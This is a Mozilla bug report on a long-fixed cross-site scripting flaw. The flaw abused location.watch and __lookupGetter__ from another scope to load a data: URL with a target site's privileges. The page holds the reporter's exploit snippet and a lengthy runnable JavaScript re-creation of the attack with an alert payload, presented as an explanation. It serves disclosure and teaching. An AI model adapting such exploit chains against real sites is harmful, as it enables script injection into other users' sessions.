Closed Bug 361961 Opened 18 years ago Closed 17 years ago

XSS by using location.watch("href") and Object.prototype.__lookupGetter__ or __lookupSetter__

Categories: Core :: DOM: Core & HTML (defect)
Hardware / OS: x86, Windows XP
Priority: Not set; Severity: normal
Status: RESOLVED FIXED
Target Milestone: mozilla1.9alpha8
People: Reporter: moz_bug_r_a4, Assigned: mrbkap
Whiteboard: [sg:high] fixed by XOW

This XSS attack only works against certain sites that are using scripts that
try to change a parent window's location.href.

An attacker can run script with a target site's principal by using
location.watch("href", ...) and Object.prototype.__lookup(G|S)etter__ method
that came from an xbl compilation scope or a target site's global scope.

  // (a) __lookupGetter__ taken from an XBL compilation scope (marquee binding):
  <marquee id="m">
  func = m.init.__lookupGetter__;
    or
  // (b) __lookupGetter__ taken from the target site's global scope:
  <iframe src="target site">
  func = frames[0].location.__lookupGetter__;

  // Attacker page, in the top window:
  location.watch("href", func);
  location.__lookupGetter__("href").toString = function() {
    return "data:text/html,<script> ... </script>";
  };

1. A target site's script executes |top.location.href = foo|.
2. __lookupGetter__("href", undefined, foo) is called on the location object in
   top window, and it returns the location.href getter function.
3. The href getter function's toString() method is called and returns a data:
   url.
4. The data: url is loaded with the target site's principal.


This affects the trunk, fx2.0.0.1, fx1.5.0.9, fx1.0.8 and moz1.7.13.
Attached file (deleted) —
Attached file (deleted) —
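The four steps in the report depend on one detail of SpiderMonkey's old Object.prototype.watch: the handler is invoked as handler.call(obj, name, oldValue, newValue) and its return value replaces the value being assigned. Passing __lookupGetter__ itself as that handler therefore turns an assignment into "return the href getter function", and the location setter then stringifies that function object. The following is an added illustration (not code from the bug report or from Gecko) that reduces the chain to plain objects so it can be run in Node: installWatch() re-creates only that return-value contract of watch(), which no longer exists in any engine, and makeLocation(), runAttack(), the URLs and the payload are constructed stand-ins. The demo has a single scope, so it shows the mechanics and not the privilege boundary; the actual fix (cross-origin wrappers) worked by denying the attacker a raw __lookupGetter__ from the target's or XBL's compilation scope in the first place.

```javascript
"use strict";

// Minimal re-creation of the one piece of SpiderMonkey's watch() contract the
// attack needs (assumption for this demo): the handler runs with `this` bound
// to the watched object, receives (name, oldValue, newValue), and whatever it
// returns is the value that actually gets stored.
function installWatch(obj, name, handler) {
  const desc = Object.getOwnPropertyDescriptor(obj, name);
  if (!desc || typeof desc.get !== "function" || typeof desc.set !== "function") {
    throw new TypeError(`${name} must be an accessor property`);
  }
  Object.defineProperty(obj, name, {
    configurable: true,
    enumerable: desc.enumerable,
    get: desc.get,                 // the getter object is deliberately unchanged
    set(newValue) {
      const oldValue = desc.get.call(this);
      const replaced = handler.call(this, name, oldValue, newValue);
      desc.set.call(this, replaced);
    },
  });
}

// Constructed stand-in for a window's location: the href setter "navigates"
// to String(v), mirroring how the real setter stringifies whatever it is given.
function makeLocation(initialHref) {
  const loc = { _href: initialHref, navigatedTo: [] };
  Object.defineProperty(loc, "href", {
    configurable: true,
    enumerable: true,
    get() { return this._href; },
    set(v) {
      const url = String(v);       // invokes v.toString() when v is an object
      this.navigatedTo.push(url);
      this._href = url;
    },
  });
  return loc;
}

// The attack, numbered as in the report. `func` plays the role of the
// __lookupGetter__ obtained from another scope; the same intrinsic is used
// here because this demo has only one scope.
function runAttack(targetUrl) {
  const top = makeLocation("http://attacker.example/");   // attacker's window
  const func = Object.prototype.__lookupGetter__;
  const payload = "data:text/html,<script>alert(document.domain)</script>";

  // Attacker setup: the watch handler *is* __lookupGetter__, and the href
  // getter it will hand back gets an attacker-controlled toString.
  installWatch(top, "href", func);
  top.__lookupGetter__("href").toString = function () { return payload; };

  // 1. The target site's script runs top.location.href = targetUrl.
  // 2. The watchpoint calls top.__lookupGetter__("href", oldValue, targetUrl),
  //    which ignores the extra arguments and returns the href getter function.
  // 3. The setter stringifies that function, hitting the overridden toString.
  // 4. The resulting data: URL is what gets "loaded".
  top.href = targetUrl;

  return { requested: targetUrl, loaded: top.navigatedTo[0], payload };
}

// Control: an ordinary watch handler that passes the assigned value through,
// so navigation goes where the target site asked.
function runBenign(targetUrl) {
  const top = makeLocation("http://attacker.example/");
  installWatch(top, "href", function (name, oldValue, newValue) { return newValue; });
  top.href = targetUrl;
  return top.navigatedTo[0];
}

console.log(runAttack("http://target.example/home"));
```

The point to take from running it: nothing in the chain is a memory bug or a parser bug. Every step is a documented behaviour (watch return-value substitution, __lookupGetter__ ignoring extra arguments, ToString calling an own toString), and the vulnerability is purely that a function compiled in a privileged or same-origin scope could be reached and invoked from a foreign one, which is exactly what cross-origin wrappers cut off.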
The "watch" part reminds me of bug 354978, but that one is fixed now and doesn't do anything to stop these testcases.
Assignee: dveditz → mrbkap
Whiteboard: [sg:high]
Component: Security → DOM
Flags: blocking1.9+
Targeting to B1 per conversation with Blake. 
Target Milestone: --- → mozilla1.9beta1
Fixed by cross origin wrappers.
Status: NEW → RESOLVED
Closed: 17 years ago
Depends on: xow
Resolution: --- → FIXED
Flags: in-testsuite?
Flags: wanted1.8.1.x+
Flags: blocking1.8.1.7?
Whiteboard: [sg:high] → [sg:high] fixed by XOW
Flags: blocking1.8.1.8? → blocking1.8.1.9?
Flags: blocking1.8.1.12? → blocking1.8.1.13?
Flags: blocking1.8.1.13?
Attachment #246672 - Attachment is private: true
Attachment #246673 - Attachment is private: true
Group: core-security
Component: DOM → DOM: Core & HTML